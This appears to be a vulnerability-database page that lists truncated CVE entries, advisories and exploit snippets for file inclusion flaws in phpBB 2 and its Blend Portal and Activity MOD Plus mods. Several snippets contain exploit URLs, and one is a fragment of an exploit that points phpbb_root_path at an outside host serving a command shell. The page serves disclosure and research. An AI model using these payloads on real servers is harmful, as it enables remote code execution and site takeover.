PT-2006-3783 · Phpbb · Phpbb 2

Name of the Vulnerable Software and Affected Versions: phpBB 2 Description: A remote file inclusion issue in phpBB 2 allows remote attackers to execute arbitrary PHP code via a URL in the page parameter of the template.php file. However, the existence of this issue has been disputed, with some...

phpBB 2.0.x - template.php Remote File Inclusion

phpBB 2.0.x - template.php Remote File Inclusion source: https://www.securityfocus.com/bid/18255/info The phpBB application is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this iss...

phpBB 2.0.x - 'template.php' Remote File Inclusion

source: https://www.securityfocus.com/bid/18255/info The phpBB application is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing...

Remote file inclusion

PHP remote file inclusion vulnerability in blenddata/blendcommon.php in Blend Portal 1.2.0, as used with phpBB when registerglobals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the phpbbrootpath parameter. NOTE: This is a similar vulnerability to CVE-2006-2507...

CVE-2006-2736

PHP remote file inclusion vulnerability in blenddata/blendcommon.php in Blend Portal 1.2.0, as used with phpBB when registerglobals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the phpbbrootpath parameter. NOTE: This is a similar vulnerability to CVE-2006-2507...

Remote file inclusion

PHP remote file inclusion vulnerability in language/langenglish/langactivity.php in Activity MOD Plus Amod 1.1.0, as used with phpBB when registerglobals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the phpbbrootpath parameter. NOTE: This is a similar vulnerabili...

CVE-2006-2736

CVE-2006-2736 is a PHP remote file inclusion vulnerability affecting Blend Portal 1.2.0 when used with phpBB with register_globals enabled. The flaw resides in blend_data/blend_common.php and allows code execution via a URL in the phpbb_root_path parameter. This entry is corroborated across multi...

CVE-2006-2735

CVE-2006-2735 is a PHP remote file inclusion vulnerability in Activity MOD Plus (Amod) 1.1.0 (language/lang_english/lang_activity.php) used with phpBB when register_globals is on. The flaw allows an attacker to execute arbitrary PHP code by supplying a URL in the phpbb_root_path parameter. The en...

CVE-2006-2693

Directory traversal vulnerability in admin/adminhackslist.php in Nivisec Hacks List 1.20 and earlier for phpBB, when registerglobals is enabled, allows remote attackers to read arbitrary files via a ".." in the phpEx parameter...

CVE-2006-2693

CVE-2006-2693 is a directory-traversal vulnerability in Nivisec Hacks List

Advisory: Blend Portal <= 1.2.0 for phpBB 2.x (blend_data/blend_common.php) File Inclusion Vulnerability

--Security Report-- Advisory: Blend Portal = 1.2.0 for phpBB 2.x blenddata/blendcommon.php File Inclusion Vulnerability. --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 28/05/06 07:52 PM --- Contacts: ICQ: 10072 MSN/Email: [email protected] Web: http://www.nukedx.com --- Vendo...

Advisory: phpBB 2.x (Activity MOD Plus) File Inclusion Vulnerability.

--Security Report-- Advisory: phpBB 2.x Activity MOD Plus File Inclusion Vulnerability. --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 27/05/06 07:49 PM --- Contacts: ICQ: 10072 MSN/Email: [email protected] Web: http://www.nukedx.com --- Vendor: phpBB-Amod...

Advisory: phpBB 2.x (admin/admin_hacks_list.php) Local Inclusion Vulnerability.

--Security Report-- Advisory: phpBB 2.x admin/adminhackslist.php Local Inclusion Vulnerability. --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 27/05/06 07:37 PM --- Contacts: ICQ: 10072 MSN/Email: [email protected] Web: http://www.nukedx.com --- Vendor: Nivisec...

Foing-xpl.txt

vendor : phpbbhacks.com Exploit BY :s3rv3rhack3r WWW : http://www.hackerz.ir Exploit / Foing Remote File Include exploit By s3rv3rhack3r / include include include include include include include include define PORT 80 char shellop = "GET /index.php?phpbbrootpath=http://www.hackerz.ir/cmd.txt?cmd=...

Blend Portal 1.2.0 - phpBB Mod Remote File Inclusion

Blend Portal 1.2.0 - phpBB Mod Remote File Inclusion Blend Portal ICQ: 10072 MSN/Mail: [email protected] web: www.nukedx.com This exploits works on Blend Portal http://victim/phpBB/blenddata/blendcommon.php?phpbbrootpath=FILE EXAMPLE -...

Blend Portal <= 1.2.0 (phpBB Mod) Remote File Inclusion Vulnerability

No description provided by source. Blend Portal = 1.2.0 for phpBB 2.x Remote File Inclusion Vulnerabilities Contacts ICQ: 10072 MSN/Mail: [email protected] web: www.nukedx.com This exploits works on Blend Portal = 1.2.0 for phpBB 2.x Original advisory can be found at:...

Activity MOD Plus <= 1.1.0 (phpBB Mod) File Inclusion Vulnerability

No description provided by source. phpBB 2.x Activity MOD Plus File Inclusion Vulnerability Contacts ICQ: 10072 MSN/Mail: [email protected] web: www.nukedx.com This exploits works on phpBB 2.x Activity MOD Plus Original advisory can be found at: http://www.nukedx.com/?viewdoc=38 Succesful...

Activity MOD Plus <= 1.1.0 (phpBB Mod) File Inclusion Vulnerability

Exploit for unknown platform in category web applications =================================================================== Activity MOD Plus http://victim/phpBB/language/langenglish/langactivity.php?phpbbrootpath=FILE EXAMPLE -...

Activity MOD Plus 1.1.0 - phpBB Mod File Inclusion

Activity MOD Plus 1.1.0 - phpBB Mod File Inclusion phpBB 2.x Activity MOD Plus File Inclusion Vulnerability Contacts ICQ: 10072 MSN/Mail: [email protected] web: www.nukedx.com This exploits works on phpBB 2.x Activity MOD Plus Original advisory can be found at: http://www.nukedx.com/?viewdoc=38...

Blend Portal <= 1.2.0 (phpBB Mod) Remote File Inclusion Vulnerability

Exploit for unknown platform in category web applications ===================================================================== Blend Portal ICQ: 10072 MSN/Mail: email protected web: www.nukedx.com This exploits works on Blend Portal http://victim/phpBB/blenddata/blendcommon.php?phpbbrootpath=FIL...